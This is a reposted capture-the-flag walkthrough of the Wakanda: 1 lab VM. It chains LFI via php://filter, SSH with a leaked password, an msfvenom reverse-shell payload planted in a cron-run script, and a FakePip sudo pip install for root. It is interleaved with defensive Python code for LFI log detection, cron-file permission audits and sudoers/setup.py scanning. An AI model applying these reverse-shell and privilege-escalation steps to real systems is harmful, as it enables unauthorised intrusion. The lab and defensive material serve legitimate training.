
Hack the Wakanda: 1 (CTF Challenge)

[Development (python) | Category: Development (python) | Posted by: 店小二04 | Date: 2018 | Author: 红领巾]

Hello friends! Today we are going to take another CTF challenge, known as Wakanda; it is another capture-the-flag challenge provided for practice. So let’s try to break through it. But before that, please note that you can download it from here.

Security Level: Intermediate

Flags: There are three flags (flag1.txt, flag2.txt, root.txt)

Penetrating Methodologies

Network scanning (Nmap, netdiscover)
HTTP service enumeration
Exploiting LFI using the php://filter wrapper
Decoding the base64-encoded text for the password
SSH login
Getting the 1st flag
Finding files owned by devops
Overwriting antivirus.py with malicious Python code
Getting a netcat session
Getting the 2nd flag
Sudo privilege escalation
Exploiting with FakePip
Getting root access and capturing the 3rd flag

WalkThrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target > 192.168.1.124

Our next step is to scan our target with NMAP.

nmap -p- -A 192.168.1.124

The NMAP output shows us that there are 4 ports open: 80 (HTTP), 111 (RPC), 3333 (SSH), 48920 (RPC).

We browsed the URL http://192.168.1.124 and poked around; however, we were not able to find any significant clues to move forward.


We didn’t find anything on the webpage, so we use dirb to enumerate the directories.

dirb http://192.168.1.124

All the pages that we find in the dirb scan have size zero, and we don’t find any content on any of them. We take a look at the source of the index page and find a “lang” parameter commented out inside the page.


We use the “lang” parameter just as it was shown in the page source and find that the text has been converted into French. Now we check whether the “lang” parameter is vulnerable to LFI.


We are able to exploit the LFI vulnerability using the “php://filter/convert.base64-encode” wrapper and read the source of the index page.

curl http://192.168.1.124/?lang=php://filter/convert.base64-encode/resource=index

We decode the base64-encoded string and find the password “Niamey4Ever227!!!”. On the page we find that “mamadou” is the author. We use these credentials to log in through SSH on the target machine.
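
The defensive side of this step, as an added example that is not part of the original walkthrough: a Python sketch of (a) how the “lang” parameter should have been handled, mapping the request value to an allowlisted file instead of passing it to an include, and (b) a small detector that pulls requests carrying php://filter, traversal and similar LFI indicators out of combined-format web logs, plus the base64 decode used during triage to see what a successful request disclosed. The allowlist, document root and log lines are constructed for the demonstration.

```python
import re
import base64
from pathlib import Path

# Constructed allowlist (not from the original page): the only language files the
# application is allowed to serve. The request parameter selects a key, never a path.
LANG_FILES = {
    "en": "index.en.html",
    "fr": "index.fr.html",
}
WEB_ROOT = Path("/var/www/html")  # assumed document root, for illustration only


def resolve_lang_file(lang):
    """Hardened replacement for include($_GET['lang'])-style code.

    Only allowlisted keys resolve; wrappers (php://...), traversal (../) and
    absolute paths are rejected instead of being handed to the filesystem.
    """
    if lang not in LANG_FILES:
        return None
    return WEB_ROOT / LANG_FILES[lang]


# Indicators of local-file-inclusion probing worth alerting on in web logs.
LFI_INDICATORS = re.compile(
    r"(php://|data:|expect://|zip://|phar://|file://|\.\./|%2e%2e|/etc/passwd|/proc/self)",
    re.IGNORECASE,
)

# Apache/nginx combined log format: client, ident, user, [time], "METHOD target proto", status
COMBINED_LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')


def detect_lfi_attempts(log_lines):
    """Return (client_ip, request_target, status) for requests carrying LFI indicators.

    Lines that do not parse as combined-format access log entries are skipped.
    """
    hits = []
    for line in log_lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        if LFI_INDICATORS.search(target):
            hits.append((ip, target, int(status)))
    return hits


def decode_filter_leak(body):
    """Decode the base64 body that php://filter/convert.base64-encode returns.

    Useful during triage to see exactly which source (and which secrets) a
    successful request found in the logs would have disclosed.
    """
    return base64.b64decode(body).decode("utf-8", errors="replace")


# Constructed access-log lines for the demonstration (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2018:10:00:01 +0000] "GET /?lang=fr HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Aug/2018:10:00:05 +0000] "GET /?lang=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Aug/2018:10:00:09 +0000] "GET /?lang=../../../../etc/passwd HTTP/1.1" 200 1300',
    "not an access log line",
]

if __name__ == "__main__":
    for ip, target, status in detect_lfi_attempts(SAMPLE_LOG):
        print(f"LFI indicator from {ip}: {target} (HTTP {status})")
    print("fr ->", resolve_lang_file("fr"))
    print("wrapper ->", resolve_lang_file("php://filter/convert.base64-encode/resource=index"))
```

Note that a 200 status on the php://filter request is the signal to escalate: the wrapper does not need the file to be executable, so a successful read of index leaks the whole source, credentials included, which is exactly how the password above was recovered.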


When we log in through SSH we get a Python interpreter prompt. We import the pty module and spawn a ‘/bin/bash’ shell. We take a look at the home directory of user mamadou and find the first flag.

ssh mamadou@192.168.1.124 -p 3333

Enumerating through the directories, inside the /tmp directory we find a file called test. We open it and find nothing interesting, but when we take a closer look at the file we find that it is owned by devops. Now we find all the files owned by user devops and find a file called “.antivirus.py” inside the /srv directory.

find / -user devops 2>/dev/null

Now when we open the Python file we find that it opens the test file and writes “test” inside it. To exploit this, we replace the code with a reverse-shell payload. First we create a msfvenom payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.134 lport=4444 R

After creating the payload, we open the “.antivirus.py” file, comment out the earlier code and insert our payload without the leading “python -c”.


We set up our listener using netcat and wait a few minutes for the script to be executed. As soon as the script is executed we get a reverse shell. When we check the UID we find that we have spawned a shell as devops. Now we go to the /home/devops directory and find the second flag. After getting the second flag we find that we can execute pip as the super user with sudo, without a password.
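
What let the .antivirus.py step work is a scheduled job executing a file that another account can modify. As an added example, not code from the walkthrough or the VM, here is a Python audit that parses /etc/crontab-style lines, finds every absolute path each job executes, and reports files that are group- or world-writable, owned by someone other than root or the job's user, or sitting in a world-writable directory without the sticky bit. The crontab text, file names and permissions in the demo are constructed in a temporary directory.

```python
import os
import pwd
import re
import stat
import tempfile
from pathlib import Path

# /etc/crontab line: five schedule fields, the user to run as, then the command.
CRON_LINE = re.compile(r"^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def current_user():
    """Name of the user running this audit (numeric uid if not in passwd)."""
    try:
        return pwd.getpwuid(os.getuid()).pw_name
    except KeyError:
        return str(os.getuid())


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text.

    Blank lines, comments and VAR=value settings are skipped.
    """
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd").strip()))
    return jobs


def paths_from_command(cmd):
    """Absolute-path tokens in a command: interpreter and script alike get checked."""
    return [tok for tok in cmd.split() if tok.startswith("/")]


def check_job_file(user, path):
    """Findings for one file a scheduled job executes as `user`.

    A file that another account can modify is a privilege-escalation path:
    whoever can write it runs code as `user` on the next scheduled run.
    """
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing (job for {user} references a file that does not exist)"]
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable, job runs as {user}")
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable, job runs as {user}")
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    if owner not in ("root", user):
        findings.append(f"{path}: owned by {owner} but executed as {user}")
    parent_mode = os.stat(Path(path).parent).st_mode
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        findings.append(f"{path}: parent directory is world-writable without the sticky bit")
    return findings


def audit_crontab(text):
    """Run check_job_file over every file referenced by every job in the crontab text."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        for path in paths_from_command(cmd):
            findings.extend(check_job_file(user, path))
    return findings


def run_demo():
    """Constructed layout in a temporary directory: one overwritable job script, one sane one."""
    tmp = Path(tempfile.mkdtemp())
    os.chmod(tmp, 0o755)
    weak = tmp / ".antivirus.py"
    safe = tmp / "backup.py"
    weak.write_text("open('/tmp/test', 'w').write('test')\n")
    safe.write_text("print('ok')\n")
    os.chmod(weak, 0o666)  # anyone may overwrite it: the condition the walkthrough abuses
    os.chmod(safe, 0o644)
    me = current_user()
    crontab = (
        "SHELL=/bin/sh\n"
        "# constructed crontab for the demonstration\n"
        f"*/5 * * * * {me} {weak} >/dev/null 2>&1\n"
        f"0 3 * * *   {me} {safe}\n"
    )
    return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in run_demo():
        print("FINDING:", finding)
```

The fix on a real host is the mirror image of the attack: the script and its directory should be owned by root (or the job's user) with mode 0644/0755, and nothing else on the box should be able to write to them. The same check applies to per-user crontabs and systemd timers; only the parser for the schedule line changes.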


Now there is a script called FakePip (download here) that can be used to exploit this misconfiguration.


We download the FakePip script onto our system to edit the payload inside it.

git clone https://github.com/0x00-0x00/FakePip.git

We edit the payload inside the os.system function.


We decode the base64-encoded string and change the IP address to our own. Then we encode the string as base64 again and replace the old string with the new one.


We start a Python HTTP server on our system so that we can transfer the FakePip script to the target machine.

python -m SimpleHTTPServer 80

After we start the HTTP server, we download the script on the target machine using wget. Then we execute the command as per the instructions given in the FakePip README file.

wget http://192.168.1.134/setup.py
sudo pip install . --upgrade --force-install

As soon as we run the command we get a reverse shell as the root user. We now go to the root directory and find the root flag.
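
Two checks a defender would run against this last step, as an added Python example that is not part of the original walkthrough or of FakePip: an audit of sudoers rules that flags NOPASSWD ALL and any rule whose command is an interpreter or package manager (pip's setup.py runs as whoever invokes pip, so “sudo pip install .” is root code execution), and a static pass over a setup.py that reports os.system/subprocess/exec-style calls and base64 decoding before anyone installs it with elevated privileges. The sudoers lines, the list of code-executing commands and the sample setup.py are constructed for the demonstration.

```python
import ast
import re

# Commands that give the invoker arbitrary code execution even when sudo
# restricts them to a single binary. Constructed starting list; extend locally.
CODE_EXECUTING_COMMANDS = {
    "pip", "pip2", "pip3", "python", "python2", "python3",
    "perl", "ruby", "node", "npm", "vim", "vi", "less", "find",
}

# user  host = (runas) TAG: cmd1, cmd2   (runas and tags are optional)
SUDOERS_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Flag sudoers rules that hand out code execution: NOPASSWD ALL, or any
    rule (password or not) whose command is an interpreter/package manager."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        who, runas = m.group("who"), m.group("runas") or "root"
        nopasswd = "NOPASSWD" in m.group("tags")
        suffix = " without a password" if nopasswd else ""
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                if nopasswd:
                    findings.append(f"{who}: ALL commands as ({runas}){suffix}")
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in CODE_EXECUTING_COMMANDS:
                findings.append(f"{who}: {cmd} executes arbitrary code as ({runas}){suffix}")
    return findings


# Calls in a setup.py that should stop an install from running under sudo.
SUSPICIOUS_ATTR_CALLS = {
    ("os", "system"), ("os", "popen"), ("os", "execv"),
    ("subprocess", "Popen"), ("subprocess", "call"), ("subprocess", "run"),
    ("subprocess", "check_output"), ("base64", "b64decode"),
}
SUSPICIOUS_NAME_CALLS = {"exec", "eval", "compile", "__import__"}


def scan_setup_py(source):
    """Static pass over setup.py: report calls that execute commands or decode
    hidden payloads. setup.py runs as whoever invokes pip, so with sudo that is root."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            key = (func.value.id, func.attr)
            if key in SUSPICIOUS_ATTR_CALLS:
                findings.append(f"line {node.lineno}: {key[0]}.{key[1]}()")
        elif isinstance(func, ast.Name) and func.id in SUSPICIOUS_NAME_CALLS:
            findings.append(f"line {node.lineno}: {func.id}()")
    return findings


# Constructed inputs for the demonstration (not taken from the target machine).
SAMPLE_SUDOERS = """Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# the shape of rule the walkthrough abuses
devops  ALL=(ALL) NOPASSWD: /usr/bin/pip
mamadou ALL=(root) /usr/bin/apt-get update
"""

SAMPLE_SETUP_PY = '''from setuptools import setup
import os, base64
# constructed: a setup.py that runs a command during "pip install ."
os.system(base64.b64decode("ZWNobyBoZWxsbw==").decode())
setup(name="demo", version="0.1")
'''

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("sudoers:", f)
    for f in scan_setup_py(SAMPLE_SETUP_PY):
        print("setup.py:", f)
```

The sudoers audit deliberately flags pip even with a password required: restricting sudo to pip is no restriction at all, since any setup.py the user controls runs with root's privileges. The setup.py scanner is a tripwire rather than a proof of safety; obfuscated installers can dodge a name-based AST check, which is why the durable fix is removing the sudo rule rather than inspecting packages harder.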


Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact here.

Please credit the source when reposting. Title: Hack the Wakanda: 1 (CTF Challenge). Source link: https://www.codesec.net/view/586973.html